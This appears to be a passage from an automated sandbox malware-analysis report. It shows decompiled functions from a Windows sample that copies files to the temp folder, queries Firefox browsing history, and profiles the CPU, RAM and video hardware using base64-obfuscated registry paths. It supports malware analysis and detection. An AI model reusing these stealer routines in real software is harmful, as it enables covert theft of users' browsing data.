                                                                                                                                                                                              0x0041271f
                                                                                                                                                                                              0x00412724
                                                                                                                                                                                              0x00412727
                                                                                                                                                                                              0x00412732
                                                                                                                                                                                              0x00412737
                                                                                                                                                                                              0x0041273a
                                                                                                                                                                                              0x00412745
                                                                                                                                                                                              0x0041274a
                                                                                                                                                                                              0x0041274d
                                                                                                                                                                                              0x00412758
                                                                                                                                                                                              0x0041275d
                                                                                                                                                                                              0x00412760
                                                                                                                                                                                              0x0041276d
                                                                                                                                                                                              0x0041276d
                                                                                                                                                                                              0x00412772
                                                                                                                                                                                              0x004126ad
                                                                                                                                                                                              0x00412789
                                                                                                                                                                                              0x0041278d
                                                                                                                                                                                              0x00412794
                                                                                                                                                                                              0x0041279b
                                                                                                                                                                                              0x004127a2
                                                                                                                                                                                              0x004127a7
                                                                                                                                                                                              0x004127aa
                                                                                                                                                                                              0x004127bf
                                                                                                                                                                                              0x004127cd
                                                                                                                                                                                              0x0041265e
                                                                                                                                                                                              0x00412660
                                                                                                                                                                                              0x00412663
                                                                                                                                                                                              0x00412663
                                                                                                                                                                                              0x004127d4
                                                                                                                                                                                              0x004127d7
                                                                                                                                                                                              0x004127da
                                                                                                                                                                                              0x004127e7
                                                                                                                                                                                              0x004127ef
                                                                                                                                                                                              0x004127fc
                                                                                                                                                                                              0x00412809
                                                                                                                                                                                              0x00412816
                                                                                                                                                                                              0x0041281e
                                                                                                                                                                                              0x0041282b
                                                                                                                                                                                              0x00412838

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 004125B0
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00412870,?,.tmp,?,?,00000000,004127AF,?,00000000,00412839,?,00000000), ref: 0041262C
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 004127CD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412696
                                                                                                                                                                                              • %TEMP%, xrefs: 004125EB
                                                                                                                                                                                              • .tmp, xrefs: 004125CB
                                                                                                                                                                                              • , xrefs: 00412760
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                                                                                                                                              • API String ID: 2381671008-462058183
                                                                                                                                                                                              • Opcode ID: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                              • Instruction ID: 880bf71673710542150f6ebe4433b3a02274b147136189202950d85bd83b2515
                                                                                                                                                                                              • Opcode Fuzzy Hash: 416e3653b17ffb8b792b409557a66c85679e4b3f6acb14a3ced176a5403dbca9
                                                                                                                                                                                              • Instruction Fuzzy Hash: A9810C71A00109AFDB00EF95DD82ADEBBB9EF48314F504536F410F72A2DB78AE558B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416744, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00416744(signed int __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t91;
				void* _t92;
				void* _t93;
				intOrPtr _t112;
				void* _t116;
				intOrPtr _t119;
				intOrPtr _t120;

				_t117 = __esi;
				_t38 = __eax | 0x5500000a;
				_t119 = _t120;
				_t92 = 0xb;
				do {
					_push(0);
					_push(0);
					_t92 = _t92 - 1;
					_t122 = _t92;
				} while (_t92 != 0);
				_t91 = _t38;
				_push(_t119);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t120;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t91);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t91,  &_v60, _t116, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t91,  &_v68, _t116, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t93);
				E00407500(0x80000002, _t91, _t93, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t91);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t91,  &_v84, _t117, _t122);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t91, _v72);
				_push( *_t91);
				_push("GetRAM: ");
				E00416584( &_v88, _t91, _t117, _t122);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t91);
				_push("Video Info\r\n");
				E00416644( &_v92, _t91, _t116, _t117);
				_push(_v92);
				E00403850();
				_t112 = 0x4169ac;
				 *[fs:eax] = _t112;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}

























                                                                                                                                                                                              0x00416744
                                                                                                                                                                                              0x00416744
                                                                                                                                                                                              0x00416749
                                                                                                                                                                                              0x0041674b
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416752
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416758
                                                                                                                                                                                              0x0041675c
                                                                                                                                                                                              0x0041675d
                                                                                                                                                                                              0x00416762
                                                                                                                                                                                              0x00416765
                                                                                                                                                                                              0x0041676c
                                                                                                                                                                                              0x00416776
                                                                                                                                                                                              0x0041677b
                                                                                                                                                                                              0x0041677e
                                                                                                                                                                                              0x00416783
                                                                                                                                                                                              0x00416788
                                                                                                                                                                                              0x00416791
                                                                                                                                                                                              0x0041679c
                                                                                                                                                                                              0x004167a4
                                                                                                                                                                                              0x004167ad
                                                                                                                                                                                              0x004167b8
                                                                                                                                                                                              0x004167c5
                                                                                                                                                                                              0x004167c6
                                                                                                                                                                                              0x004167cb
                                                                                                                                                                                              0x004167ce
                                                                                                                                                                                              0x004167db
                                                                                                                                                                                              0x004167e5
                                                                                                                                                                                              0x004167f4
                                                                                                                                                                                              0x004167ff
                                                                                                                                                                                              0x00416804
                                                                                                                                                                                              0x0041680d
                                                                                                                                                                                              0x00416812
                                                                                                                                                                                              0x00416815
                                                                                                                                                                                              0x00416822
                                                                                                                                                                                              0x0041682c
                                                                                                                                                                                              0x00416831
                                                                                                                                                                                              0x00416833
                                                                                                                                                                                              0x0041683b
                                                                                                                                                                                              0x00416840
                                                                                                                                                                                              0x00416843
                                                                                                                                                                                              0x0041684f
                                                                                                                                                                                              0x00416854
                                                                                                                                                                                              0x00416856
                                                                                                                                                                                              0x0041685e
                                                                                                                                                                                              0x00416863
                                                                                                                                                                                              0x00416872
                                                                                                                                                                                              0x00416879
                                                                                                                                                                                              0x0041687c
                                                                                                                                                                                              0x0041687f
                                                                                                                                                                                              0x0041688c
                                                                                                                                                                                              0x00416894
                                                                                                                                                                                              0x0041689c
                                                                                                                                                                                              0x004168a9
                                                                                                                                                                                              0x004168b1
                                                                                                                                                                                              0x004168b9
                                                                                                                                                                                              0x004168c1
                                                                                                                                                                                              0x004168d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                              • Instruction ID: 93658ecaa3e0ddcdd5b33a88495a7f5ee5c1cb8a97fdfd99440d65a07410f67b
                                                                                                                                                                                              • Opcode Fuzzy Hash: ea7c467229dc03554361d8e6d8d9c9cd62cd80fa8131b6840d5b8a065aae733e
                                                                                                                                                                                              • Instruction Fuzzy Hash: DF411F70A1010DABDB01FFD1D882ACDBBB9EF48309F61403BF504B7296D639EA458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416748, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 114COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00416748(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr* _t90;
				void* _t91;
				void* _t92;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t119;

				_t116 = __esi;
				_t115 = __edi;
				_t118 = _t119;
				_t91 = 0xb;
				do {
					_push(0);
					_push(0);
					_t91 = _t91 - 1;
					_t120 = _t91;
				} while (_t91 != 0);
				_t90 = __eax;
				_push(_t118);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t119;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t90);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t90,  &_v60, __edi, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t90,  &_v68, __edi, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t92);
				E00407500(0x80000002, _t90, _t92, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t90);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t90,  &_v84, _t116, _t120);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t90, _v72);
				_push( *_t90);
				_push("GetRAM: ");
				E00416584( &_v88, _t90, _t116, _t120);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t90);
				_push("Video Info\r\n");
				E00416644( &_v92, _t90, _t115, _t116);
				_push(_v92);
				E00403850();
				_t111 = 0x4169ac;
				 *[fs:eax] = _t111;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}























                                                                                                                                                                                              0x00416748
                                                                                                                                                                                              0x00416748
                                                                                                                                                                                              0x00416749
                                                                                                                                                                                              0x0041674b
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416750
                                                                                                                                                                                              0x00416752
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416754
                                                                                                                                                                                              0x00416758
                                                                                                                                                                                              0x0041675c
                                                                                                                                                                                              0x0041675d
                                                                                                                                                                                              0x00416762
                                                                                                                                                                                              0x00416765
                                                                                                                                                                                              0x0041676c
                                                                                                                                                                                              0x00416776
                                                                                                                                                                                              0x0041677b
                                                                                                                                                                                              0x0041677e
                                                                                                                                                                                              0x00416783
                                                                                                                                                                                              0x00416788
                                                                                                                                                                                              0x00416791
                                                                                                                                                                                              0x0041679c
                                                                                                                                                                                              0x004167a4
                                                                                                                                                                                              0x004167ad
                                                                                                                                                                                              0x004167b8
                                                                                                                                                                                              0x004167c5
                                                                                                                                                                                              0x004167c6
                                                                                                                                                                                              0x004167cb
                                                                                                                                                                                              0x004167ce
                                                                                                                                                                                              0x004167db
                                                                                                                                                                                              0x004167e5
                                                                                                                                                                                              0x004167f4
                                                                                                                                                                                              0x004167ff
                                                                                                                                                                                              0x00416804
                                                                                                                                                                                              0x0041680d
                                                                                                                                                                                              0x00416812
                                                                                                                                                                                              0x00416815
                                                                                                                                                                                              0x00416822
                                                                                                                                                                                              0x0041682c
                                                                                                                                                                                              0x00416831
                                                                                                                                                                                              0x00416833
                                                                                                                                                                                              0x0041683b
                                                                                                                                                                                              0x00416840
                                                                                                                                                                                              0x00416843
                                                                                                                                                                                              0x0041684f
                                                                                                                                                                                              0x00416854
                                                                                                                                                                                              0x00416856
                                                                                                                                                                                              0x0041685e
                                                                                                                                                                                              0x00416863
                                                                                                                                                                                              0x00416872
                                                                                                                                                                                              0x00416879
                                                                                                                                                                                              0x0041687c
                                                                                                                                                                                              0x0041687f
                                                                                                                                                                                              0x0041688c
                                                                                                                                                                                              0x00416894
                                                                                                                                                                                              0x0041689c
                                                                                                                                                                                              0x004168a9
                                                                                                                                                                                              0x004168b1
                                                                                                                                                                                              0x004168b9
                                                                                                                                                                                              0x004168c1
                                                                                                                                                                                              0x004168d3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FreeString$InfoSystem
                                                                                                                                                                                              • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                              • API String ID: 4070941872-1038824218
                                                                                                                                                                                              • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                              • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                                                                                                                                              • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00403368, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 79%
                                                                                                                                                                                              			E00403368(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41c034 == 0) {
					if( *0x41b024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
						 *0x41c220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                              0x00403370
                                                                                                                                                                                              0x004033d0
                                                                                                                                                                                              0x004033e0
                                                                                                                                                                                              0x004033e0
                                                                                                                                                                                              0x004033e6
                                                                                                                                                                                              0x00403372
                                                                                                                                                                                              0x0040337b
                                                                                                                                                                                              0x0040338b
                                                                                                                                                                                              0x0040338b
                                                                                                                                                                                              0x004033a7
                                                                                                                                                                                              0x004033c8
                                                                                                                                                                                              0x004033c8

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                                                                                                                                              • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                                                                                                                                                                                              • MessageBoxA.USER32 ref: 004033E0
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                                                                                                              • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                              • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                              • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00402668, Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00402668(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00403AC0(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                              0x0040266c
                                                                                                                                                                                              0x0040266e
                                                                                                                                                                                              0x0040267a
                                                                                                                                                                                              0x0040267a
                                                                                                                                                                                              0x0040267a
                                                                                                                                                                                              0x0040267e
                                                                                                                                                                                              0x00402678
                                                                                                                                                                                              0x00402678
                                                                                                                                                                                              0x0040267a
                                                                                                                                                                                              0x0040267a
                                                                                                                                                                                              0x0040267e
                                                                                                                                                                                              0x00402678
                                                                                                                                                                                              0x00402678
                                                                                                                                                                                              0x00402684
                                                                                                                                                                                              0x00402687
                                                                                                                                                                                              0x00402694
                                                                                                                                                                                              0x00402696
                                                                                                                                                                                              0x004026dd
                                                                                                                                                                                              0x004026dd
                                                                                                                                                                                              0x004026e1
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040269c
                                                                                                                                                                                              0x004026d0
                                                                                                                                                                                              0x004026d9
                                                                                                                                                                                              0x004026db
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004026db
                                                                                                                                                                                              0x004026a4
                                                                                                                                                                                              0x004026b6
                                                                                                                                                                                              0x004026b6
                                                                                                                                                                                              0x004026ba
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004026a9
                                                                                                                                                                                              0x004026b2
                                                                                                                                                                                              0x004026b4
                                                                                                                                                                                              0x004026b4
                                                                                                                                                                                              0x004026c3
                                                                                                                                                                                              0x004026cb
                                                                                                                                                                                              0x004026cb
                                                                                                                                                                                              0x004026c3
                                                                                                                                                                                              0x004026e7
                                                                                                                                                                                              0x004026ec
                                                                                                                                                                                              0x004026ee
                                                                                                                                                                                              0x004026f0
                                                                                                                                                                                              0x00402745
                                                                                                                                                                                              0x00402745
                                                                                                                                                                                              0x00402749
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x004026f6
                                                                                                                                                                                              0x00402731
                                                                                                                                                                                              0x00402738
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040273a
                                                                                                                                                                                              0x0040273a
                                                                                                                                                                                              0x0040273c
                                                                                                                                                                                              0x0040273f
                                                                                                                                                                                              0x00402740
                                                                                                                                                                                              0x00402741
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040273a
                                                                                                                                                                                              0x004026fe
                                                                                                                                                                                              0x00402717
                                                                                                                                                                                              0x00402717
                                                                                                                                                                                              0x0040271b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00402703
                                                                                                                                                                                              0x0040270a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040270c
                                                                                                                                                                                              0x0040270c
                                                                                                                                                                                              0x0040270e
                                                                                                                                                                                              0x00402711
                                                                                                                                                                                              0x00402712
                                                                                                                                                                                              0x00402713
                                                                                                                                                                                              0x0040270c
                                                                                                                                                                                              0x00402724
                                                                                                                                                                                              0x0040272c
                                                                                                                                                                                              0x0040272c
                                                                                                                                                                                              0x00402724
                                                                                                                                                                                              0x00402751
                                                                                                                                                                                              0x0040268f
                                                                                                                                                                                              0x0040268f
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x0040268f
                                                                                                                                                                                              0x00402687

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                                                                                                                                                                                              • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                                                                                                                                                                                              • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CharNext
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3213498283-0
                                                                                                                                                                                              • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                              • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                                                                                                                                              • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410E70, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void* _t161;
				intOrPtr* _t166;
				intOrPtr* _t172;
				intOrPtr* _t178;
				void* _t180;
				intOrPtr* _t184;
				void* _t187;
				intOrPtr _t208;
				intOrPtr _t210;
				void* _t216;
				intOrPtr _t222;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;

				_t224 = __esi;
				_t186 = __ebx;
				_t226 = _t227;
				_t187 = 0xb;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
					_t234 = _t187;
				} while (_t187 != 0);
				_push(__ebx);
